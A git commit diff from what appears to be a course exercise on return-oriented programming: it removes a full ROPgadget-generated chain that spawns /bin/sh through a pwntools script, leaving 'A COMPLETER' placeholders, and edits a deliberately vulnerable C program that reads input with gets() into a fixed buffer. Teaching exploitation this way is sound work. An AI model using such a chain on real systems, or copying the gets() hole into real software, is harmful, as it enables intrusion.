new repertory

2 years ago · 78ab5f79ca
parent 5f0619125a
commit 78ab5f79ca
3 changed files with 13 additions and 83 deletions
--- a/tpattempt/pyscript
+++ b/tpattempt/pyscript
@ -1,94 +1,23 @@
 #!/usr/bin/env python3
 # execve generated by ROPgadget

-from struct import pack
 from pwn import *

-# Padding goes here
-
 p = b''

 r = process('./rop')

-p +=  p64(0x00000000004077ce) # pop rsi ; ret
-p +=  p64(0x00000000004b2000) # @ .data
-p +=  p64(0x00000000004437e3) # pop rax ; ret
-p += b'/bin//sh'
-p +=  p64(0x0000000000445171) # mov qword ptr [rsi], rax ; ret
-p +=  p64(0x00000000004077ce) # pop rsi ; ret
-p +=  p64(0x00000000004b2008) # @ .data + 8
-p +=  p64(0x0000000000439720) # xor rax, rax ; ret
-p +=  p64(0x0000000000445171) # mov qword ptr [rsi], rax ; ret
-p +=  p64(0x00000000004017de) # pop rdi ; ret
-p +=  p64(0x00000000004b2000) # @ .data
-p +=  p64(0x00000000004077ce) # pop rsi ; ret
-p +=  p64(0x00000000004b2008) # @ .data + 8
-p +=  p64(0x00000000004016fb) # pop rdx ; ret
-p +=  p64(0x00000000004b2008) # @ .data + 8
-p +=  p64(0x0000000000439720) # xor rax, rax ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
-p +=  p64(0x000000000040120b) # syscall
-
-
-# print(p)
+# A COMPLETER
+# A COMPLETER
+# A COMPLETER
+# A COMPLETER
+# A COMPLETER
+# A COMPLETER
+# A COMPLETER
+# A COMPLETER
+# A COMPLETER
+# A COMPLETER
+# ...

 r.sendline(p)
 r.interactive()
--- a/tpattempt/rop
+++ b/tpattempt/rop
--- a/tpattempt/vun.c
+++ b/tpattempt/vun.c
@ -1,12 +1,13 @@
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
+
 int main(int argc, char ** argv) {
    char buff[128];

    gets(buff);

-    char *password = "I am h4cknd0";
+    char *password = "I am TP ROP PM 2 !";

    if (strcmp(buff, password)) {
        printf("You password is incorrect\n");